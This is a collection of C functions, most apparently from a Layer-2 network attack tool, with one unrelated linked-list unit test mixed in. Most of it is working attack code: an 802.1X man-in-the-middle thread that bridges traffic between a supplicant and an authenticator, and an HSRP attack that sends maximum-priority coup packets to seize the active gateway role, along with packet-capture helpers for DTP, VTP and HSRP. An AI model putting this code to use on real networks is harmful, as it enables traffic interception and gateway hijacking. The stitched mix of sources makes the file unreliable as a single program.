void gtk_c_toggle_interface(GtkWidget *toggle, struct term_node *node) { gboolean state; const gchar *label; dlist_t *found; struct interface_data *iface_data, *iface_new; label = gtk_button_get_label(GTK_BUTTON(toggle)); state = gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON(toggle)); if (!state) { found = dlist_search(node->used_ints->list, node->used_ints->cmp, (void *)label); iface_data = (struct interface_data *) dlist_data(found); interfaces_disable(iface_data->ifname); node->used_ints->list = dlist_remove(node->used_ints->list, (void *)iface_data); } else { /* First we need to get the interface index */ found = dlist_search(interfaces->list, interfaces->cmp, (void *)label); if (!found) /* Not found */ return; iface_data = (struct interface_data *) dlist_data(found); interfaces_enable(iface_data->ifname); iface_new = (struct interface_data *) calloc(1, sizeof(struct interface_data)); memcpy((void *)iface_new, (void *)iface_data, sizeof(struct interface_data)); node->used_ints->list = dlist_append(node->used_ints->list, (void *)iface_new); } }
static int dlist_int_test() { printf("double list test ... MAX=%d\n", MAX); int arr[MAX]; int i; int sum = 0; int max = INT_MIN; printf("MAX = %d\n", MAX); struct dlist *list = dlist_init(); if (list) { /* * init arr */ for (i = 0; i < MAX; i++) { arr[i] = i; } /* * dlist_add/dlist_length test */ for (i = 0; i < MAX; i++) { dlist_add(list, arr + i); assert(dlist_length(list) == i + 1); } /* * dlist_serch test */ for (i = 0; i < MAX; i++) { assert(dlist_search(list, arr + i) == DLIST_RET_OK); } /* * dlist_printf test */ assert(dlist_printf(list, user_printf) == DLIST_RET_OK); assert(dlist_foreach(list, sum_cb, &sum) == DLIST_RET_OK); assert(dlist_foreach(list, max_cb, &max) == DLIST_RET_OK); /* * dlist_delete test */ for (i = MAX - 1; i >= 0; i--) { assert(dlist_length(list) == i + 1); assert(dlist_delete(list, arr + i) == DLIST_RET_OK); assert(dlist_length(list) == i); } /* * dlist_destroy test */ assert(dlist_destroy(list) == DLIST_RET_OK); } printf("sum = %d\n", sum); printf("max = %d\n", max); return 0; }
int8_t dot1x_learn_packet(struct attacks *attacks, char *iface, u_int8_t *stop, void *data, struct pcap_pkthdr *header) { struct dot1x_data *dot1x_data; struct pcap_data pcap_aux; u_int8_t *packet, got_802_1x_pkt = 0; u_int16_t *cursor; dlist_t *p; struct interface_data *iface_data; dot1x_data = data; if ((packet = calloc(1, SNAPLEN)) == NULL) return -1; if (iface) { p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, iface); if (!p) return -1; iface_data = (struct interface_data *) dlist_data(p); } else iface_data = NULL; while (!got_802_1x_pkt && !(*stop)) { interfaces_get_packet(attacks->used_ints, iface_data, stop, header, packet, PROTO_DOT1X, NO_TIMEOUT); if (*stop) { free(packet); return -1; } cursor = (u_int16_t *)(packet + 12); pcap_aux.header = header; pcap_aux.packet = packet; if (!dot1x_load_values((struct pcap_data *)&pcap_aux, dot1x_data)) got_802_1x_pkt = 1; } /* While got */ free(packet); return 0; }
int8_t vtp_learn_packet(struct attacks *attacks, char *iface, u_int8_t *stop, void *data, struct pcap_pkthdr *header) { struct vtp_data *vtp_data; struct pcap_data pcap_aux; u_int8_t *packet, *cursor, got_vtp_packet = 0; dlist_t *p; struct interface_data *iface_data; vtp_data = data; if ((packet = calloc(1, SNAPLEN)) == NULL) return -1; if (iface) { p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, iface); if (!p) return -1; iface_data = (struct interface_data *) dlist_data(p); } else { iface_data = NULL; } while (!got_vtp_packet && !(*stop)) { interfaces_get_packet(attacks->used_ints, iface_data, stop, header, packet, PROTO_VTP, NO_TIMEOUT); if (*stop) { free(packet); return -1; } cursor = (packet + LIBNET_802_3_H + LIBNET_802_2_H); pcap_aux.header = header; pcap_aux.packet = packet; if (!vtp_load_values((struct pcap_data *)&pcap_aux, vtp_data)) got_vtp_packet = 1; } /* While got */ free(packet); return 0; }
int8_t dtp_learn_packet( struct attacks *attacks, char *iface, u_int8_t *stop, void *data, struct pcap_pkthdr *header ) { struct dtp_data *dtp_data = (struct dtp_data *)data; struct interface_data *iface_data = NULL ; struct pcap_data pcap_aux; u_int8_t *packet, got_dtp_packet = 0; dlist_t *p; int8_t ret = -1 ; if ( iface) { p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, iface); if ( !p ) return -1; iface_data = (struct interface_data *) dlist_data(p); } packet = (u_int8_t *)calloc( 1, SNAPLEN ); if ( packet ) { while ( !got_dtp_packet && !(*stop) ) { interfaces_get_packet( attacks->used_ints, iface_data, stop, header, packet, PROTO_DTP, NO_TIMEOUT ); if ( !(*stop) ) { pcap_aux.header = header; pcap_aux.packet = packet; if ( !dtp_load_values( (struct pcap_data *)&pcap_aux, dtp_data ) ) { ret = 0 ; got_dtp_packet = 1; } } } free(packet); } return ret ; }
int8_t hsrp_learn_packet( struct attacks *attacks, char *iface, u_int8_t *stop, void *data, struct pcap_pkthdr *header, struct pcap_data *pcap_aux) { struct hsrp_data *hsrp_data = (struct hsrp_data *)data; struct interface_data *iface_data = NULL ; u_int8_t got_hsrp_packet = 0; u_int8_t *packet; dlist_t *p; int8_t ret = -1 ; if ( iface ) { p = dlist_search( attacks->used_ints->list, attacks->used_ints->cmp, iface ); if ( !p ) return -1; iface_data = (struct interface_data *) dlist_data(p); } packet = calloc( 1, SNAPLEN ); if ( packet ) { while ( !got_hsrp_packet && !(*stop) ) { interfaces_get_packet( attacks->used_ints, iface_data, stop, header, packet, PROTO_HSRP, NO_TIMEOUT ); if ( !(*stop) ) { pcap_aux->header = header; pcap_aux->packet = packet; if ( !hsrp_load_values( pcap_aux, hsrp_data ) ) { got_hsrp_packet = 1; ret = 0 ; } } } free(packet); } return ret; }
/* * 802.1X MitM simple attack. * You'll need 2 network interfaces, 1 attached * to the supplicant device and the other attached * to the authenticator device. */ void dot1x_th_mitm( void *arg ) { struct attacks *attacks = (struct attacks *)arg; struct attack_param *param = (struct attack_param *)attacks->params; sigset_t mask; struct pcap_pkthdr header; struct libnet_802_3_hdr *ether; struct timeval now; struct dot1x_mitm_ifaces mitm_ifaces; struct interface_data *iface; dlist_t *p; u_int8_t *packet; pthread_mutex_lock(&attacks->attack_th.finished); pthread_detach(pthread_self()); sigfillset(&mask); if (pthread_sigmask(SIG_BLOCK, &mask, NULL)) { thread_error("dot1x_th_mitm pthread_sigmask()",errno); dot1x_th_mitm_exit(attacks); } p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, param[DOT1X_MITM_IFACE_AUTH].value); mitm_ifaces.auth = (struct interface_data *) dlist_data(p); p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, param[DOT1X_MITM_IFACE_SUPP].value); mitm_ifaces.supp = (struct interface_data *) dlist_data(p); if (!mitm_ifaces.auth || !mitm_ifaces.supp) { if (!mitm_ifaces.auth) write_log(0,"Ooops!! Interface %s not existent!!\n",param[DOT1X_MITM_IFACE_AUTH].value); else write_log(0,"Ooops!! Interface %s not existent!!\n",param[DOT1X_MITM_IFACE_SUPP].value); write_log(0," Have you enabled the interface? Sure?...\n"); dot1x_th_mitm_exit(attacks); } gettimeofday(&now,NULL); header.ts.tv_sec = now.tv_sec; header.ts.tv_usec = now.tv_usec; if ((packet = calloc(1, SNAPLEN)) == NULL) dot1x_th_mitm_exit(attacks); /* Get Authenticator MAC address... */ interfaces_get_packet(attacks->used_ints, mitm_ifaces.auth, &attacks->attack_th.stop, &header, packet, PROTO_DOT1X, NO_TIMEOUT ); if (attacks->attack_th.stop) { free(packet); dot1x_th_mitm_exit(attacks); } ether = (struct libnet_802_3_hdr *) packet; write_log(0, " Authenticator MAC = %02X:%02X:%02X:%02X:%02X:%02X\n", ether->_802_3_shost[0], ether->_802_3_shost[1], ether->_802_3_shost[2], ether->_802_3_shost[3], ether->_802_3_shost[4], ether->_802_3_shost[5]); memcpy((void *)mitm_ifaces.mac_auth,(void *)ether->_802_3_shost,6); /* Get supplicant MAC address */ interfaces_get_packet( attacks->used_ints, mitm_ifaces.supp, &attacks->attack_th.stop, &header, packet, PROTO_DOT1X, NO_TIMEOUT ); if (attacks->attack_th.stop) { free(packet); dot1x_th_mitm_exit(attacks); } ether = (struct libnet_802_3_hdr *) packet; write_log(0, " Supplicant MAC = %02X:%02X:%02X:%02X:%02X:%02X\n", ether->_802_3_shost[0], ether->_802_3_shost[1], ether->_802_3_shost[2], ether->_802_3_shost[3], ether->_802_3_shost[4], ether->_802_3_shost[5]); memcpy((void *)mitm_ifaces.mac_supp,(void *)ether->_802_3_shost,6); /* Ok... Now start the funny bridging side... */ while( !attacks->attack_th.stop ) { iface = interfaces_get_packet(attacks->used_ints, NULL, &attacks->attack_th.stop, &header, packet, PROTO_DOT1X, NO_TIMEOUT); if (attacks->attack_th.stop) break; ether = (struct libnet_802_3_hdr *) packet; /* Authenticator interface? */ if (iface->libnet_handler == mitm_ifaces.auth->libnet_handler) { if (!memcmp(mitm_ifaces.mac_supp,ether->_802_3_shost,6) ) continue; /* Oops!! Its our packet... */ dot1x_send_raw(mitm_ifaces.supp, (packet+LIBNET_802_3_H), (header.len-LIBNET_802_3_H), mitm_ifaces.mac_auth, mitm_ifaces.mac_supp); continue; } /* Supplicant interface? */ if (iface->libnet_handler == mitm_ifaces.supp->libnet_handler) { if (!memcmp(mitm_ifaces.mac_auth,ether->_802_3_shost,6) ) continue; /* Oops!! Its our packet... */ dot1x_send_raw(mitm_ifaces.auth, (packet+LIBNET_802_3_H), (header.len-LIBNET_802_3_H), mitm_ifaces.mac_supp, mitm_ifaces.mac_auth); continue; } } free(packet); dot1x_th_mitm_exit(attacks); }
void hsrp_th_become_active( void *arg ) { struct attacks *attacks = (struct attacks *)arg; struct hsrp_data *hsrp_data = (struct hsrp_data *)attacks->data; struct attack_param *param = attacks->params; struct interface_data *iface_data; struct timeval now; sigset_t mask; struct pcap_pkthdr header; struct pcap_data pcap_aux; u_int32_t lbl32; dlist_t *p; pthread_mutex_lock(&attacks->attack_th.finished); pthread_detach(pthread_self()); sigfillset(&mask); if (pthread_sigmask(SIG_BLOCK, &mask, NULL)) { thread_error("hsrp_send_discover pthread_sigmask()",errno); hsrp_th_become_active_exit(attacks); } gettimeofday(&now,NULL); header.ts.tv_sec = now.tv_sec; header.ts.tv_usec = now.tv_usec; if ( ! hsrp_learn_packet( attacks, NULL, &attacks->attack_th.stop, attacks->data,&header, &pcap_aux ) ) { hsrp_data->opcode = HSRP_TYPE_COUP; hsrp_data->state = HSRP_STATE_SPEAK; if ( attacks->attack == HSRP_ATTACK_BECOME_ACTIVE ) memcpy((void *)&hsrp_data->sip, (void *)param[HSRP_SOURCE_IP].value, 4); else if ( attacks->attack == HSRP_ATTACK_MITM_BECOME_ACTIVE ) { /* Get interface's ip address */ p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, pcap_aux.iface); iface_data = (struct interface_data *) dlist_data(p); hsrp_data->sip = ntohl(inet_addr(iface_data->ipaddr)); /* libnet fix */ lbl32 = ntohl(hsrp_data->sip); memcpy((void *)&hsrp_data->sip, &lbl32, 4); } /* libnet fix */ hsrp_data->dip = inet_addr("224.0.0.2"); /* Max priority */ hsrp_data->priority = 0xFF; hsrp_send_packet(attacks); hsrp_data->opcode = HSRP_TYPE_HELLO; hsrp_data->state = HSRP_STATE_ACTIVE; if ( ! thread_create( &attacks->helper_th, &hsrp_send_hellos, attacks) ) { while ( ! attacks->attack_th.stop ) thread_usleep( 200000 ); } else write_log( 0, "hsrp_th_become_active thread_create error\n" ); } hsrp_th_become_active_exit(attacks); }